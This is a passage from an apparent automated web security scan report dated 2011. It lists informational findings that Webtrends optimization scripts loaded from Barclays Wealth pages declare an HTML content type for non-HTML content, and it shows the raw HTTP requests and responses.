User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f0088adcd; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1836E1C2F530E7BCED230AB0A2091BE5; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=045f6179; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202c8abcc; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.40. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50089a11cd86b4411cb50bc864d3c94c6b4cd13ccf4ff4a36690a90955abc09a35b0bbd27175cd4cf1bf3dea9b9b42b9f41f8652aa10714ac52017eb6a6b5781d68ac05c32457c454b1e201a4559ef20b7389d91aca3670ba35bad458bc67c35186546bab3503c81baa26e60457968771f75aeb1ed97f6c46211ed4b6afa3986733d7eead8dd39df3dda8b4113849ffc8cfc68b090813d61e6e0699179b0353640383139a11baa9a5b813f66c1c4af20f146e414ce02607246d79e5a66a17f97765146706192807de971bcc99a9b428b450789021b63b15417261e5ecbb2c01581711ed71d8eacbfd0cda1d529cda7f1cf74dc5500ebe6beaa96988e67fadcfed7a08543cfe72f4b14e79380224c3996114489077da999c7cb5cef5ef569b63e40f171b693c9a985f48514653a2e44c1f0e83bb811c0314f0b5f9499d10f64d4c9f8bad85f708186d05e313cf6d4e7761b05eb87e9e8ee1d8595867f12dd80b8f9f93e183167d502c0a85eb5f881540a5ac8b5dbb9bad2089dba28d794359a7562e262c143f0e67b77fa62cb103811c47616599279878429607438920714938b50f77975f4c5d8fdf9b5bf514d1a01af7b087f7ad7a0aab7ea08cfd2a89746456ddf9091a966f0358e815167f8ef747fbaab6a41fc5526c0ed747519b71c0d1ac90fbc52268b2ee491acfc474d3a81f9a2ea68f5c6d6e7c49bb78c1fef2d52cb62e6263411767c21e131e1b81ca93b5393327d3c01858de3845b58a862c3766d0767141f2acd59ea71476c0852496d2d5747b3544edf81ffd16862fc5b618ffa64acb06a0e1c1f1d657a462a796c282881ca8d914f57dfe16cd9c7379dd57a39f5c9213ea76f3e246b0bc7318c8ea7041e3731d99fc857cf6038000be267e69bfe059dd784240f76ec74eeab584deccfd049156402ab83d7fae6fc4e41d0160292bdf1c3bc4ada51036f24394cbe5d410ce664ca7a4dd9b8926f8d1267a3b4cd6d23b66d608fd61542275652f6c0b590e1a753c67069b48a7fc89012408726216ab142b610b6dc6f805705ccfacea01849a7dce8a19afabed01488c282b19a2582e52f65c5fc189b17e6491c6a2bda98cbf11a67a4e85f4338cae012d02f6b518ace0acd71b6e37a2a1c450940c12a160d7854f110eb1ef6dda0e97a86ce381daa5d65b51fede81f33dd6e98dd3fd8c176602dd4452  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50089a11cd86b4411cb50bc864d3c94c6b4cd13ccf4ff4a36690a90955abc09a35b0bbd27175cd4cf1bf3dea9b9b42b9f41f8652aa10714ac52017eb6a6b5781d68ac05c32457c454b1e201a4559ef20b7389d91aca3670ba35bad458bc67c35186546bab3503c81baa26e60457968771f75aeb1ed97f6c46211ed4b6afa3986733d7eead8dd39df3dda8b4113849ffc8cfc68b090813d61e6e0699179b0353640383139a11baa9a5b813f66c1c4af20f146e414ce02607246d79e5a66a17f97765146706192807de971bcc99a9b428b450789021b63b15417261e5ecbb2c01581711ed71d8eacbfd0cda1d529cda7f1cf74dc5500ebe6beaa96988e67fadcfed7a08543cfe72f4b14e79380224c3996114489077da999c7cb5cef5ef569b63e40f171b693c9a985f48514653a2e44c1f0e83bb811c0314f0b5f9499d10f64d4c9f8bad85f708186d05e313cf6d4e7761b05eb87e9e8ee1d8595867f12dd80b8f9f93e183167d502c0a85eb5f881540a5ac8b5dbb9bad2089dba28d794359a7562e262c143f0e67b77fa62cb103811c47616599279878429607438920714938b50f77975f4c5d8fdf9b5bf514d1a01af7b087f7ad7a0aab7ea08cfd2a89746456ddf9091a966f0358e815167f8ef747fbaab6a41fc5526c0ed747519b71c0d1ac90fbc52268b2ee491acfc474d3a81f9a2ea68f5c6d6e7c49bb78c1fef2d52cb62e6263411767c21e131e1b81ca93b5393327d3c01858de3845b58a862c3766d0767141f2acd59ea71476c0852496d2d5747b3544edf81ffd16862fc5b618ffa64acb06a0e1c1f1d657a462a796c282881ca8d914f57dfe16cd9c7379dd57a39f5c9213ea76f3e246b0bc7318c8ea7041e3731d99fc857cf6038000be267e69bfe059dd784240f76ec74eeab584deccfd049156402ab83d7fae6fc4e41d0160292bdf1c3bc4ada51036f24394cbe5d410ce664ca7a4dd9b8926f8d1267a3b4cd6d23b66d608fd61542275652f6c0b590e1a753c67069b48a7fc89012408726216ab142b610b6dc6f805705ccfacea01849a7dce8a19afabed01488c282b19a2582e52f65c5fc189b17e6491c6a2bda98cbf11a67a4e85f4338cae012d02f6b518ace0acd71b6e37a2a1c450940c12a160d7854f110eb1ef6dda0e97a86ce381daa5d65b51fede81f33dd6e98dd3fd8c176602dd4452

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50089a11cd86b4411cb50bc864d3c94c6b4cd13ccf4ff4a36690a90955abc09a35b0bbd27175cd4cf1bf3dea9b9b42b9f41f8652aa10714ac52017eb6a6b5781d68ac05c32457c454b1e201a4559ef20b7389d91aca3670ba35bad458bc67c35186546bab3503c81baa26e60457968771f75aeb1ed97f6c46211ed4b6afa3986733d7eead8dd39df3dda8b4113849ffc8cfc68b090813d61e6e0699179b0353640383139a11baa9a5b813f66c1c4af20f146e414ce02607246d79e5a66a17f97765146706192807de971bcc99a9b428b450789021b63b15417261e5ecbb2c01581711ed71d8eacbfd0cda1d529cda7f1cf74dc5500ebe6beaa96988e67fadcfed7a08543cfe72f4b14e79380224c3996114489077da999c7cb5cef5ef569b63e40f171b693c9a985f48514653a2e44c1f0e83bb811c0314f0b5f9499d10f64d4c9f8bad85f708186d05e313cf6d4e7761b05eb87e9e8ee1d8595867f12dd80b8f9f93e183167d502c0a85eb5f881540a5ac8b5dbb9bad2089dba28d794359a7562e262c143f0e67b77fa62cb103811c47616599279878429607438920714938b50f77975f4c5d8fdf9b5bf514d1a01af7b087f7ad7a0aab7ea08cfd2a89746456ddf9091a966f0358e815167f8ef747fbaab6a41fc5526c0ed747519b71c0d1ac90fbc52268b2ee491acfc474d3a81f9a2ea68f5c6d6e7c49bb78c1fef2d52cb62e6263411767c21e131e1b81ca93b5393327d3c01858de3845b58a862c3766d0767141f2acd59ea71476c0852496d2d5747b3544edf81ffd16862fc5b618ffa64acb06a0e1c1f1d657a462a796c282881ca8d914f57dfe16cd9c7379dd57a39f5c9213ea76f3e246b0bc7318c8ea7041e3731d99fc857cf6038000be267e69bfe059dd784240f76ec74eeab584deccfd049156402ab83d7fae6fc4e41d0160292bdf1c3bc4ada51036f24394cbe5d410ce664ca7a4dd9b8926f8d1267a3b4cd6d23b66d608fd61542275652f6c0b590e1a753c67069b48a7fc89012408726216ab142b610b6dc6f805705ccfacea01849a7dce8a19afabed01488c282b19a2582e52f65c5fc189b17e6491c6a2bda98cbf11a67a4e85f4338cae012d02f6b518ace0acd71b6e37a2a1c450940c12a160d7854f110eb1ef6dda0e97a86ce381daa5d65b51fede81f33dd6e98dd3fd8c176602dd4452 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=052836ce; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202f2ddfb; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.41. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e932029c8164; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01ca2f20; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202d188d0; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
